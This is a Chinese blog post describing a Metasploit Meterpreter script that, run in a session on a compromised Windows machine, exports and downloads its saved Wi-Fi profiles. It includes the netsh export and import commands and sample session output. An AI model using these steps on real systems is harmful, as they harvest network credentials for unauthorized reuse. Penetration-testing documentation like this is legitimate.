Metasploit获取WLAN配置文件脚本详解
Metasploit getwlanprofiles
这是一个简单的Meterpreter脚本,当在Windows 7或Vista系统上运行时,可以提取并下载Windows客户端设置的所有无线配置文件(不包含第三方客户端应用的配置)。
工作原理
- 使用以下命令将所有配置文件转储到当前%TEMP%目录:
netsh wlan export profile folder=%TEMP% - 解析输出结果的每一行,找到配置文件文件名并下载
- 清理临时文件
下载的配置文件存储在.msf3/logs/scripts/wlan_profiles/目录中。
配置文件重用
可以通过以下命令将配置文件导入其他Windows系统:
netsh wlan add profile filename="the_filename.xml"
使用说明
- 解压脚本并移动到meterpreter/scripts目录
- 建议同时移除文件名中的版本号
- 运行效果示例:
meterpreter > run getwlanprofiles [*] Running Windows Wlan Profile Downloader Meterpreter Script [*] New session on 192.168.0.80:53831... [*] Running export command... [*] Downloading profile wpa_profile... [*] Deleting temporary file... [*] Found and extracted 3 profiles [*] Done!
已知限制
当移除外接无线网卡时,netsh脚本将无法访问相关配置文件。重新插入网卡后配置恢复。
下载
致谢
本脚本主要基于Carlos Perez的优秀Meterpreter脚本。灵感来源于《Hacking Exposed Wireless, Second Edition》一书。
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
公众号二维码
浙公网安备 33010602011771号